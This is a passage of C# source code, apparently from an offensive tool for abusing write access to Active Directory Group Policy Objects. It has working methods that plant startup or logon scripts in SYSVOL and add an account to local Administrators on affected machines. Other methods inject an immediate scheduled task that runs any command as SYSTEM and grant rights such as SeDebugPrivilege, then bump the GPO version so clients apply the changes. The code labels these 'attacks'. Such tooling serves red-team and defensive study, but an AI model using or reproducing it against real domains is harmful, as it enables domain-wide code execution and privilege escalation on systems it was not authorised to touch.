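        /// <summary>
        /// Registers <paramref name="ScriptName"/> as a GPO startup script (Computer) or logon script (User):
        /// writes <paramref name="ScriptContents"/> into the GPO's SYSVOL Scripts folder, adds a
        /// "<n>CmdLine=" / "<n>Parameters=" pair to the hidden scripts.ini in the matching section,
        /// then bumps the GPO version through GroupPolicy.UpdateVersion.
        /// </summary>
        /// <param name="ScriptName">Plain file name of the script. A value containing a directory component is rejected.</param>
        /// <param name="ScriptContents">Text written verbatim as the script file.</param>
        /// <param name="Domain">Domain DNS name; used both as the SYSVOL server and as the share sub-folder.</param>
        /// <param name="DomainController">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="GPOName">Display name of the target GPO.</param>
        /// <param name="DistinguishedName">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="objectType">"Computer" (Machine\Scripts\Startup, [Startup] section) or "User"
        /// (User\Scripts\Logon, [Logon] section); anything else is rejected before touching SYSVOL.</param>
        public static void NewStartupScript(string ScriptName, string ScriptContents, string Domain, string DomainController, string GPOName, string DistinguishedName, string objectType)
        {
            bool isComputer = string.Equals(objectType, "Computer", StringComparison.Ordinal);
            bool isUser     = string.Equals(objectType, "User", StringComparison.Ordinal);
            if (!isComputer && !isUser)
            {
                Console.Error.WriteLine("[!] objectType must be \"Computer\" or \"User\".");
                return;
            }

            // A name with a path separator would place the file outside the Scripts folder while the
            // CmdLine entry still points inside it; fail early instead of writing a dangling entry.
            if (string.IsNullOrWhiteSpace(ScriptName) || !string.Equals(ScriptName, Path.GetFileName(ScriptName), StringComparison.Ordinal))
            {
                Console.Error.WriteLine("[!] ScriptName must be a plain file name without a directory component.");
                return;
            }

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
            if (string.IsNullOrEmpty(GPOGuid))
            {
                // With an empty GUID the path below would be the Policies root, which exists.
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // Verbatim string: backslashes are literal, so they are written single here. The previous
            // form escaped them as "\\" inside an @-string and produced doubled separators in the UNC path.
            string gpoRoot  = $@"\\{Domain}\SysVol\{Domain}\Policies\{GPOGuid}";
            string GPT_path = gpoRoot + "\\GPT.ini";

            if (!Directory.Exists(gpoRoot))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // Machine\Scripts\scripts.ini holds [Startup]/[Shutdown]; User\Scripts\scripts.ini holds [Logon]/[Logoff].
            string section     = isComputer ? "[Startup]" : "[Logon]";
            string scriptDir   = isComputer ? gpoRoot + "\\Machine\\Scripts\\Startup\\" : gpoRoot + "\\User\\Scripts\\Logon\\";
            string hidden_path = isComputer ? gpoRoot + "\\Machine\\Scripts\\scripts.ini" : gpoRoot + "\\User\\Scripts\\scripts.ini";

            if (!Directory.Exists(scriptDir))
            {
                Directory.CreateDirectory(scriptDir);
            }

            string scriptPath = scriptDir + ScriptName;
            if (File.Exists(scriptPath))
            {
                Console.Error.WriteLine("[!] A Startup script with the same name already exists. Choose a different name.");
                return;
            }

            if (File.Exists(hidden_path))
            {
                AppendScriptIniEntry(hidden_path, section, ScriptName);
            }
            else
            {
                string hidden_ini = Environment.NewLine + section + Environment.NewLine + "0CmdLine=" + ScriptName + Environment.NewLine + "0Parameters=" + Environment.NewLine;
                File.WriteAllText(hidden_path, hidden_ini);
                // scripts.ini is a hidden file when written by GPMC; keep the same attribute.
                File.SetAttributes(hidden_path, File.GetAttributes(hidden_path) | FileAttributes.Hidden);
            }

            Console.WriteLine("[+] Creating new startup script...");
            File.WriteAllText(scriptPath, ScriptContents);

            GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewStartupScript", isComputer ? "Computer" : "User");
        }

        /// <summary>
        /// Adds "<n>CmdLine=<scriptName>" and "<n>Parameters=" to the end of <paramref name="section"/>
        /// in an existing scripts.ini, where n is one past the highest index already used in that section
        /// (0 when the section is absent, in which case the section is appended to the file).
        /// </summary>
        /// <remarks>
        /// Two defects of the earlier inline version are fixed here: the index was taken from the first
        /// character only, so "10CmdLine" counted as 1 and indices repeated after ten entries; and the
        /// new pair was appended at the end of the file, which put it under whatever section came last
        /// (e.g. [Shutdown] or [Logoff]) instead of the requested one.
        /// </remarks>
        private static void AppendScriptIniEntry(string iniPath, string section, string scriptName)
        {
            // StreamWriter/File.WriteAllLines cannot overwrite a hidden file, so clear the attribute
            // while editing and restore it afterwards even if the rewrite fails.
            FileAttributes original = File.GetAttributes(iniPath);
            if ((original & FileAttributes.Hidden) == FileAttributes.Hidden)
            {
                File.SetAttributes(iniPath, original & ~FileAttributes.Hidden);
            }

            try
            {
                List<string> lines = new List<string>(File.ReadAllLines(iniPath));

                // Find the target section header and where the section ends (next header or EOF).
                int sectionStart = -1;
                int sectionEnd   = lines.Count;
                for (int i = 0; i < lines.Count; i++)
                {
                    string trimmed = lines[i].Trim();
                    if (sectionStart < 0)
                    {
                        if (string.Equals(trimmed, section, StringComparison.OrdinalIgnoreCase))
                        {
                            sectionStart = i;
                        }
                    }
                    else if (trimmed.StartsWith("[", StringComparison.Ordinal))
                    {
                        sectionEnd = i;
                        break;
                    }
                }

                int next = 0;
                if (sectionStart < 0)
                {
                    lines.Add(section);
                    sectionEnd = lines.Count;
                }
                else
                {
                    for (int i = sectionStart + 1; i < sectionEnd; i++)
                    {
                        Match m = Regex.Match(lines[i].TrimStart(), @"^([0-9]+)CmdLine=", RegexOptions.IgnoreCase);
                        int idx;
                        if (m.Success && int.TryParse(m.Groups[1].Value, out idx) && idx >= next)
                        {
                            next = idx + 1;
                        }
                    }
                }

                // Insert Parameters first, then CmdLine at the same index, so CmdLine ends up first.
                lines.Insert(sectionEnd, next + "Parameters=");
                lines.Insert(sectionEnd, next + "CmdLine=" + scriptName);

                File.WriteAllLines(iniPath, lines);
            }
            finally
            {
                File.SetAttributes(iniPath, File.GetAttributes(iniPath) | FileAttributes.Hidden);
            }
        }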
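        /// <summary>
        /// Makes <paramref name="UserAccount"/> a member of the local Administrators group (S-1-5-32-544)
        /// on every computer the GPO applies to, by writing a [Group Membership] entry into the GPO's
        /// Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf and bumping the GPO version.
        /// </summary>
        /// <param name="UserAccount">sAMAccountName of the account; resolved to a SID through the domain controller.</param>
        /// <param name="Domain">Domain DNS name; used both as the SYSVOL server and as the share sub-folder.</param>
        /// <param name="DomainController">Used for the SID lookup and passed to GroupPolicy.GetGPOGUID.</param>
        /// <param name="GPOName">Display name of the target GPO.</param>
        /// <param name="DistinguishedName">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="Force">Required when GptTmpl.inf already contains a [Group Membership] section.
        /// The existing Administrators member list is kept and the new SID appended to it.</param>
        public static void NewLocalAdmin(string UserAccount, string Domain, string DomainController, string GPOName, string DistinguishedName, bool Force)
        {
            // GptTmpl.inf lists members by SID (prefixed with '*'), so resolve the account first.
            string userSid = null;
            using (PrincipalContext principalContext = new PrincipalContext(ContextType.Domain, DomainController))
            {
                try
                {
                    // FindByIdentity returns null rather than throwing when there is no such account.
                    using (UserPrincipal userPrincipal = UserPrincipal.FindByIdentity(principalContext, IdentityType.SamAccountName, UserAccount))
                    {
                        if (userPrincipal != null)
                        {
                            userSid = userPrincipal.Sid.Value;
                        }
                    }
                }
                catch (Exception ex)
                {
                    Console.Error.WriteLine($"[-] Lookup of {UserAccount} against {DomainController} failed: {ex.Message}");
                }
            }
            if (string.IsNullOrEmpty(userSid))
            {
                // The earlier version printed this and carried on, then dereferenced a null principal.
                Console.Error.WriteLine($"[-] Could not find user {UserAccount} in the {Domain} domain.");
                return;
            }
            Console.WriteLine($"[+] SID Value of {UserAccount} = {userSid}");

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
            if (string.IsNullOrEmpty(GPOGuid))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            string template = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision=1";

            // Administrators member line as it looks with all spaces removed.
            const string membersKey = "*S-1-5-32-544__Members=";
            string[] newLocalAdmin = { "[Group Membership]", "*S-1-5-32-544__Memberof =", "*S-1-5-32-544__Members = *" + userSid };

            // Verbatim string: single backslashes are literal (the "\\" form doubled them).
            string gpoRoot = $@"\\{Domain}\SysVol\{Domain}\Policies\{GPOGuid}";
            string gptPath = gpoRoot + "\\GPT.ini";

            if (!Directory.Exists(gpoRoot))
            {
                Console.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            string secEditDir = gpoRoot + "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
            if (!Directory.Exists(secEditDir))
            {
                Directory.CreateDirectory(secEditDir);
            }
            string gpoPath = secEditDir + "GptTmpl.inf";

            if (!File.Exists(gpoPath))
            {
                Console.WriteLine("[+] Creating file " + gpoPath);
                File.WriteAllText(gpoPath, template + Environment.NewLine + string.Join(Environment.NewLine, newLocalAdmin));
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
                return;
            }

            Console.WriteLine("[+] File exists: {0}", gpoPath);
            string[] readText = File.ReadAllLines(gpoPath);
            int headerIndex = Array.FindIndex(readText, l => l.IndexOf("[Group Membership]", StringComparison.OrdinalIgnoreCase) >= 0);

            if (headerIndex < 0)
            {
                // No memberships defined yet: append our section to GptTmpl.inf. (The earlier version
                // opened gptPath here and so overwrote GPT.ini with this content.)
                Console.WriteLine("[+] The GPO does not specify any group memberships.");
                File.WriteAllLines(gpoPath, readText.Concat(newLocalAdmin));
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
                return;
            }

            if (!Force)
            {
                Console.WriteLine("[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!");
                return;
            }

            // Merge into the existing Administrators member list rather than replacing it.
            bool membersLineFound = false;
            List<string> output = new List<string>(readText.Length + 1);
            foreach (string l in readText)
            {
                string compact = l.Replace(" ", "");
                if (!compact.StartsWith(membersKey, StringComparison.OrdinalIgnoreCase))
                {
                    output.Add(l);
                    continue;
                }

                membersLineFound = true;
                if (compact.IndexOf(userSid, StringComparison.OrdinalIgnoreCase) >= 0)
                {
                    Console.WriteLine("[!] " + UserAccount + " is already listed in the Administrators membership of this GPO. Nothing to do.");
                    return;
                }
                // A non-empty list is comma-separated; an empty "Members =" gets the first entry.
                // Every matching line is re-emitted: the earlier version dropped the line when its
                // culture-sensitive Compare() returned neither >0 nor ==0.
                output.Add(compact.Length > membersKey.Length ? l + ", *" + userSid : l + " *" + userSid);
            }

            if (!membersLineFound)
            {
                // Section exists but Administrators is not listed; add the member line under the header.
                // (Previously this case rewrote the file unchanged and still bumped the version.)
                output.Insert(headerIndex + 1, newLocalAdmin[2]);
            }

            File.WriteAllLines(gpoPath, output);
            GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
        }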
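        /// <summary>
        /// Adds a Group Policy Preferences "immediate task" (ImmediateTaskV2) to the GPO's
        /// Machine\Preferences\ScheduledTasks\ScheduledTasks.xml (Computer) or
        /// User\Preferences\ScheduledTasks\ScheduledTasks.xml (User), creating the file when absent and,
        /// with <paramref name="Force"/>, appending to an existing one; then bumps the GPO version.
        /// </summary>
        /// <param name="Domain">Domain DNS name; used both as the SYSVOL server and as the share sub-folder.</param>
        /// <param name="DomainController">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="GPOName">Display name of the target GPO.</param>
        /// <param name="DistinguishedName">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="TaskName">Task name (used for both the preference item and the task).</param>
        /// <param name="Author">Value of the task's RegistrationInfo/Author element.</param>
        /// <param name="Arguments">Arguments for the Exec action; may be null or empty.</param>
        /// <param name="Command">Program run by the Exec action.</param>
        /// <param name="Force">Required to append when ScheduledTasks.xml already exists.</param>
        /// <param name="ObjectType">"Computer" (runs as NT AUTHORITY\System, S4U) or "User" (runs as the
        /// logging-on user, InteractiveToken); anything else is rejected.</param>
        public static void NewImmediateTask(string Domain, string DomainController, string GPOName, string DistinguishedName, string TaskName, string Author, string Arguments, string Command, bool Force, string ObjectType)
        {
            bool isComputer = string.Equals(ObjectType, "Computer", StringComparison.Ordinal);
            bool isUser     = string.Equals(ObjectType, "User", StringComparison.Ordinal);
            if (!isComputer && !isUser)
            {
                Console.Error.WriteLine("[!] ObjectType must be \"Computer\" or \"User\".");
                return;
            }

            // Operator-supplied values are XML-escaped: an '&', '<' or quote in Command/Arguments/TaskName
            // would otherwise leave ScheduledTasks.xml malformed. SecurityElement.Escape returns null for null.
            string author    = System.Security.SecurityElement.Escape(Author) ?? string.Empty;
            string taskName  = System.Security.SecurityElement.Escape(TaskName) ?? string.Empty;
            string command   = System.Security.SecurityElement.Escape(Command) ?? string.Empty;
            string arguments = System.Security.SecurityElement.Escape(Arguments) ?? string.Empty;

            // The two variants differ only in the principal and logon type.
            string principal = isComputer ? @"NT AUTHORITY\System" : @"%LogonDomain%\%LogonUser%";
            string logonType = isComputer ? "S4U" : "InteractiveToken";
            // 'changed' is the item's modification timestamp. It used to be a fixed 2019 literal that was
            // identical in every task this tool wrote; stamp the actual time instead.
            string changed   = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss", System.Globalization.CultureInfo.InvariantCulture);

            // NOTE: DisallowStartIfOnBatteries/StopIfGoingOnBatteries are left at "true" as in the original
            // template, so a machine running on battery will not start (or will stop) the task.
            string start = @"<?xml version=""1.0"" encoding=""utf-8""?><ScheduledTasks clsid=""{CC63F200-7309-4ba0-B154-A71CD118DBCC}"">";
            string end   = @"</ScheduledTasks>";
            string ImmediateTaskXML = string.Format(
                @"<ImmediateTaskV2 clsid=""{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}"" name=""{1}"" image=""0"" changed=""{7}"" uid=""{4}""><Properties action=""C"" name=""{1}"" runAs=""{5}"" logonType=""{6}""><Task version=""1.3""><RegistrationInfo><Author>{0}</Author><Description></Description></RegistrationInfo><Principals><Principal id=""Author""><UserId>{5}</UserId><LogonType>{6}</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context=""Author""><Exec><Command>{2}</Command><Arguments>{3}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>",
                author, taskName, command, arguments, Guid.NewGuid().ToString(), principal, logonType, changed);

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
            if (string.IsNullOrEmpty(GPOGuid))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // Verbatim string: single backslashes are literal (the "\\" form doubled them).
            string gpoRoot  = $@"\\{Domain}\SysVol\{Domain}\Policies\{GPOGuid}";
            string GPT_path = gpoRoot + "\\GPT.ini";

            if (!Directory.Exists(gpoRoot))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            string taskDir = isComputer ? gpoRoot + "\\Machine\\Preferences\\ScheduledTasks\\" : gpoRoot + "\\User\\Preferences\\ScheduledTasks\\";
            if (!Directory.Exists(taskDir))
            {
                Directory.CreateDirectory(taskDir);
            }
            string path = taskDir + "ScheduledTasks.xml";

            if (!File.Exists(path))
            {
                Console.WriteLine($"[+] Creating file {path}");
                File.WriteAllText(path, start + ImmediateTaskXML + end);
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", ObjectType);
                return;
            }

            if (!Force)
            {
                Console.WriteLine("[!] The GPO already includes a ScheduledTasks.xml. Use --Force to append to ScheduledTasks.xml or choose another GPO.");
                return;
            }

            Console.WriteLine("[+] Modifying " + path);
            string[] lines = File.ReadAllLines(path);
            bool inserted = false;
            for (int i = 0; i < lines.Length && !inserted; i++)
            {
                int close = lines[i].IndexOf("</ScheduledTasks>", StringComparison.Ordinal);
                if (close >= 0)
                {
                    // Insert directly before the closing tag. The earlier version prepended the task to the
                    // whole line, which, for the single-line document this tool itself writes, placed the
                    // task ahead of the <?xml ...> declaration.
                    lines[i] = lines[i].Insert(close, ImmediateTaskXML);
                    inserted = true;
                }
            }

            if (!inserted)
            {
                // Previously the file was rewritten unchanged and the version bumped anyway.
                Console.Error.WriteLine("[!] Could not find </ScheduledTasks> in " + path + ". File left unchanged.");
                return;
            }

            File.WriteAllLines(path, lines);
            GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", ObjectType);
        }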
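        /// <summary>
        /// Grants <paramref name="UserAccount"/> the user rights named in <paramref name="NewRights"/>
        /// (e.g. SeDebugPrivilege) on every computer the GPO applies to, by writing a [Privilege Rights]
        /// section into the GPO's Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf and bumping the GPO version.
        /// A GptTmpl.inf that already has a [Privilege Rights] section is left untouched.
        /// </summary>
        /// <param name="Domain">Domain DNS name; used both as the SYSVOL server and as the share sub-folder.</param>
        /// <param name="DomainController">Used for the SID lookup and passed to GroupPolicy.GetGPOGUID.</param>
        /// <param name="GPOName">Display name of the target GPO.</param>
        /// <param name="DistinguishedName">Passed through to GroupPolicy.GetGPOGUID.</param>
        /// <param name="NewRights">Right names, one "<Right> = *<SID>" line each; blanks and duplicates are dropped.</param>
        /// <param name="UserAccount">sAMAccountName of the account; resolved to a SID through the domain controller.</param>
        public static void AddNewRights(string Domain, string DomainController, string GPOName, string DistinguishedName, string[] NewRights, string UserAccount)
        {
            // Normalise the request first so an empty one fails before any LDAP or SYSVOL access.
            string[] rights = (NewRights ?? new string[0])
                .Where(r => !string.IsNullOrWhiteSpace(r))
                .Select(r => r.Trim())
                .Distinct(StringComparer.OrdinalIgnoreCase)
                .ToArray();
            if (rights.Length == 0)
            {
                Console.Error.WriteLine("[!] No user rights were specified.");
                return;
            }

            // GptTmpl.inf references accounts by SID (prefixed with '*'), so resolve the account first.
            string userSid = null;
            using (PrincipalContext ctx = new PrincipalContext(ContextType.Domain, DomainController))
            {
                try
                {
                    // FindByIdentity returns null rather than throwing when there is no such account.
                    using (UserPrincipal usr = UserPrincipal.FindByIdentity(ctx, IdentityType.SamAccountName, UserAccount))
                    {
                        if (usr != null)
                        {
                            userSid = usr.Sid.Value;
                        }
                    }
                }
                catch (Exception ex)
                {
                    Console.Error.WriteLine($"[!] Lookup of {UserAccount} against {DomainController} failed: {ex.Message}");
                }
            }
            if (string.IsNullOrEmpty(userSid))
            {
                Console.Error.WriteLine($"[!] Could not find user {UserAccount} in the {Domain} domain.");
                return;
            }
            Console.WriteLine("[+] SID Value of " + UserAccount + " = " + userSid);

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);
            if (string.IsNullOrEmpty(GPOGuid))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            string text = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision = 1
[Privilege Rights]";

            // One "<Right> = *<SID>" line per requested right.
            string[] rightLines = rights.Select(r => r + " = *" + userSid).ToArray();

            // Verbatim string: single backslashes are literal (the "\\" form doubled them).
            string gpoRoot  = $@"\\{Domain}\SysVol\{Domain}\Policies\{GPOGuid}";
            string GPT_path = gpoRoot + "\\GPT.ini";

            if (!Directory.Exists(gpoRoot))
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            string secEditDir = gpoRoot + "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
            if (!Directory.Exists(secEditDir))
            {
                Directory.CreateDirectory(secEditDir);
            }
            string path = secEditDir + "GptTmpl.inf";

            if (!File.Exists(path))
            {
                Console.WriteLine("[+] Creating file " + path);
                File.WriteAllText(path, text + Environment.NewLine + string.Join(Environment.NewLine, rightLines));
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
                return;
            }

            Console.WriteLine("[+] File exists: " + path);
            string[] readText = File.ReadAllLines(path);

            if (Array.Exists(readText, s => s.IndexOf("[Privilege Rights]", StringComparison.OrdinalIgnoreCase) >= 0))
            {
                // Merging into an existing [Privilege Rights] section is not implemented: a right that is
                // already defined there would end up listed twice, and this tool does not know which
                // definition the client would apply or what the GPO granted before.
                Console.Error.WriteLine("[!] The GPO already specifies user rights. Select a different attack.");
                return;
            }

            Console.WriteLine("[+] The GPO does not specify any user rights. Adding new rights...");
            File.WriteAllLines(path, readText.Concat(new[] { "[Privilege Rights]" }).Concat(rightLines));
            GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
        }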